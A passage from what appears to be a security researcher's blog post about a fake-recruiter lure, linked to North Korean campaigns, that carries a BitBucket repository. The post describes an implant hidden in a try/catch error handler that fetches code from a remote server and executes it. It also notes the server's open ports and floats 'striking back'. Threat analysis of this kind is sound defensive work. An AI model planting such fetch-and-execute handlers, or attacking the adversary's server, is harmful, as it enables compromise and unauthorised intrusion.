7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>After successfully patching the issue, I just needed to send a video of the fix working, and I would be paid the astronomical amount of <strong>500 USDT</strong> for a <em>3-line patch</em>.</p><pre><code>&lt;sarcasm&gt;</code></pre><p>I can&#8217;t believe there are <strong><a href="https://www.freebsd.org/projects/">BSD</a></strong><a href="https://www.freebsd.org/projects/"> kernel developers</a> out there submitting patches for free&#8230;</p><pre><code>&lt;/sarcasm&gt;</code></pre><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!10Fc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ef31042-f877-4c94-ba1a-692a405fb1a9_3222x2098.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!10Fc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ef31042-f877-4c94-ba1a-692a405fb1a9_3222x2098.png 424w, https://substackcdn.com/image/fetch/$s_!10Fc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ef31042-f877-4c94-ba1a-692a405fb1a9_3222x2098.png 848w, https://substackcdn.com/image/fetch/$s_!10Fc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ef31042-f877-4c94-ba1a-692a405fb1a9_3222x2098.png 1272w, https://substackcdn.com/image/fetch/$s_!10Fc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ef31042-f877-4c94-ba1a-692a405fb1a9_3222x2098.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!10Fc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ef31042-f877-4c94-ba1a-692a405fb1a9_3222x2098.png" width="1456" height="948" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3ef31042-f877-4c94-ba1a-692a405fb1a9_3222x2098.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:948,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1574653,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ef31042-f877-4c94-ba1a-692a405fb1a9_3222x2098.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!10Fc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ef31042-f877-4c94-ba1a-692a405fb1a9_3222x2098.png 424w, https://substackcdn.com/image/fetch/$s_!10Fc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ef31042-f877-4c94-ba1a-692a405fb1a9_3222x2098.png 848w, https://substackcdn.com/image/fetch/$s_!10Fc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ef31042-f877-4c94-ba1a-692a405fb1a9_3222x2098.png 1272w, https://substackcdn.com/image/fetch/$s_!10Fc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ef31042-f877-4c94-ba1a-692a405fb1a9_3222x2098.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>I accepted, because I can smell a good old-fashioned <strong><a href="https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/advanced-persistent-threat-apt/">APT</a></strong> campaign miles away. </p><p>And then, our friend &#8220;Wilton&#8221; shared a <strong>BitBucket</strong> repository.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!vYZY!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12aa8fb8-b203-462d-9ecf-10ca8c992032_3222x2098.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!vYZY!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12aa8fb8-b203-462d-9ecf-10ca8c992032_3222x2098.png 424w, https://substackcdn.com/image/fetch/$s_!vYZY!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12aa8fb8-b203-462d-9ecf-10ca8c992032_3222x2098.png 848w, https://substackcdn.com/image/fetch/$s_!vYZY!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12aa8fb8-b203-462d-9ecf-10ca8c992032_3222x2098.png 1272w, https://substackcdn.com/image/fetch/$s_!vYZY!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12aa8fb8-b203-462d-9ecf-10ca8c992032_3222x2098.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!vYZY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12aa8fb8-b203-462d-9ecf-10ca8c992032_3222x2098.png" width="1456" height="948" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/12aa8fb8-b203-462d-9ecf-10ca8c992032_3222x2098.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:948,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1007030,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12aa8fb8-b203-462d-9ecf-10ca8c992032_3222x2098.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!vYZY!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12aa8fb8-b203-462d-9ecf-10ca8c992032_3222x2098.png 424w, https://substackcdn.com/image/fetch/$s_!vYZY!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12aa8fb8-b203-462d-9ecf-10ca8c992032_3222x2098.png 848w, https://substackcdn.com/image/fetch/$s_!vYZY!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12aa8fb8-b203-462d-9ecf-10ca8c992032_3222x2098.png 1272w, https://substackcdn.com/image/fetch/$s_!vYZY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12aa8fb8-b203-462d-9ecf-10ca8c992032_3222x2098.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">See the background panel. Creation date: yesterday.</figcaption></figure></div><p>Time to get the work done, I guess.</p><div><hr></div><h2>Trying to Catch an Otter</h2><p>There&#8217;s an important context to add here. The <strong><a href="https://en.wikipedia.org/wiki/Qianlima">Chollimas</a></strong> (North Korean state-sponsored actors) are running a campaign <strong>targeting engineers and executives</strong> in the fintech and crypto sectors. </p><p>They attempt to trick engineers with <strong>fake job interviews</strong> or postings, coaxing them into running <strong>infected coding challenges</strong>. </p><p>They also target executives by luring them into <strong>Zoom calls with fake VCs or business partners</strong>. Once in, the attackers <strong>feign not hearing the victim speaking</strong> and act angry about it. Then, one of them shares a <strong>fake Zoom fix or update</strong> to solve the issue. Over the fear of the deal going sour, the victim usually runs it and gets infected. This effort is being tracked as <strong>DevPopper</strong> or <strong><a href="https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-job-seekers-as-fake-recruiters/">ContagiousInterview</a></strong>.</p><p>But this time, it&#8217;s different. As noted in the closure of the last section, this repository was created just a day ago, with no public mentions of it, the person who shared it with me, or the endpoints and infrastructure it attempts to reach. </p><p>Everything is <strong>brand new</strong>. </p><p>But there&#8217;s still something more sinister about it: <strong>the code is completely clean</strong>. There&#8217;s no malicious payload, fake packages, infected libraries, or dependencies. </p><p>In <a href="https://en.wikipedia.org/wiki/William_Gibson">Gibson&#8217;s</a> words: <em>It&#8217;s clear as ethanol.</em></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!1m36!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F04222f94-d012-4999-a6f1-d0d303c9b74f_888x499.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!1m36!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F04222f94-d012-4999-a6f1-d0d303c9b74f_888x499.jpeg 424w, https://substackcdn.com/image/fetch/$s_!1m36!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F04222f94-d012-4999-a6f1-d0d303c9b74f_888x499.jpeg 848w, https://substackcdn.com/image/fetch/$s_!1m36!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F04222f94-d012-4999-a6f1-d0d303c9b74f_888x499.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!1m36!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F04222f94-d012-4999-a6f1-d0d303c9b74f_888x499.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!1m36!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F04222f94-d012-4999-a6f1-d0d303c9b74f_888x499.jpeg" width="625" height="351.2105855855856" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/04222f94-d012-4999-a6f1-d0d303c9b74f_888x499.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:499,&quot;width&quot;:888,&quot;resizeWidth&quot;:625,&quot;bytes&quot;:66238,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F04222f94-d012-4999-a6f1-d0d303c9b74f_888x499.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!1m36!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F04222f94-d012-4999-a6f1-d0d303c9b74f_888x499.jpeg 424w, https://substackcdn.com/image/fetch/$s_!1m36!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F04222f94-d012-4999-a6f1-d0d303c9b74f_888x499.jpeg 848w, https://substackcdn.com/image/fetch/$s_!1m36!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F04222f94-d012-4999-a6f1-d0d303c9b74f_888x499.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!1m36!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F04222f94-d012-4999-a6f1-d0d303c9b74f_888x499.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Different Lazarus divisions have different approaches.</figcaption></figure></div><p>But then, after carefully reviewing the code, I found their <em>entry point</em>, and I must say, it <strong>is the most creative one I&#8217;ve seen in a long time</strong>. While the code itself isn&#8217;t malicious, there&#8217;s a specific bootstrap function <strong>that will always fail</strong>. However, it&#8217;s contained within a <strong><a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/try...catch">Try/Catch</a></strong> block&#8212;a special construct where the language will <strong>Try</strong> to do something and <strong>Catch</strong> the workflow if something goes wrong, preventing it from crashing, <strong>and doing something</strong> to remediate the error.</p><p>That <strong>Catch</strong> block, in this case, will invoke a function called <strong>errorHandler</strong>, which will receive an error code <strong>directly from an external API</strong>&#8230; and execute it.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!-uJv!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21eee81-55f9-4dfb-a3c5-8ba506956121_2130x1932.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!-uJv!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21eee81-55f9-4dfb-a3c5-8ba506956121_2130x1932.png 424w, https://substackcdn.com/image/fetch/$s_!-uJv!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21eee81-55f9-4dfb-a3c5-8ba506956121_2130x1932.png 848w, https://substackcdn.com/image/fetch/$s_!-uJv!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21eee81-55f9-4dfb-a3c5-8ba506956121_2130x1932.png 1272w, https://substackcdn.com/image/fetch/$s_!-uJv!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21eee81-55f9-4dfb-a3c5-8ba506956121_2130x1932.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!-uJv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21eee81-55f9-4dfb-a3c5-8ba506956121_2130x1932.png" width="1456" height="1321" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e21eee81-55f9-4dfb-a3c5-8ba506956121_2130x1932.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1321,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1059944,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21eee81-55f9-4dfb-a3c5-8ba506956121_2130x1932.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!-uJv!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21eee81-55f9-4dfb-a3c5-8ba506956121_2130x1932.png 424w, https://substackcdn.com/image/fetch/$s_!-uJv!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21eee81-55f9-4dfb-a3c5-8ba506956121_2130x1932.png 848w, https://substackcdn.com/image/fetch/$s_!-uJv!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21eee81-55f9-4dfb-a3c5-8ba506956121_2130x1932.png 1272w, https://substackcdn.com/image/fetch/$s_!-uJv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21eee81-55f9-4dfb-a3c5-8ba506956121_2130x1932.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>You read it right: the error code comes from a distant server in <strong>Finland</strong> (not a Gibson reference), and it is then executed via a <em>require</em> statement.</p><p><strong>This is our implant!</strong> </p><p>Now, we could just burn it in an intelligence pulse&#8230; or better yet, use what we know to strike back. </p><p>The server has two open ports: port 80, running the API on <strong><a href="https://expressjs.com/es/">Node.js Express</a></strong>, and port 7777, identified as running <strong>RDP</strong> (<strong>Remote Desktop Protocol</strong> for <strong>Windows</strong>).</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BkvE!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BkvE!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 424w, https://substackcdn.com/image/fetch/$s_!BkvE!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 848w, https://substackcdn.com/image/fetch/$s_!BkvE!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 1272w, https://substackcdn.com/image/fetch/$s_!BkvE!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BkvE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png" width="1456" height="1060" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1060,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:522800,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!BkvE!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 424w, https://substackcdn.com/image/fetch/$s_!BkvE!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 848w, https://substackcdn.com/image/fetch/$s_!BkvE!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 1272w, https://substackcdn.com/image/fetch/$s_!BkvE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" 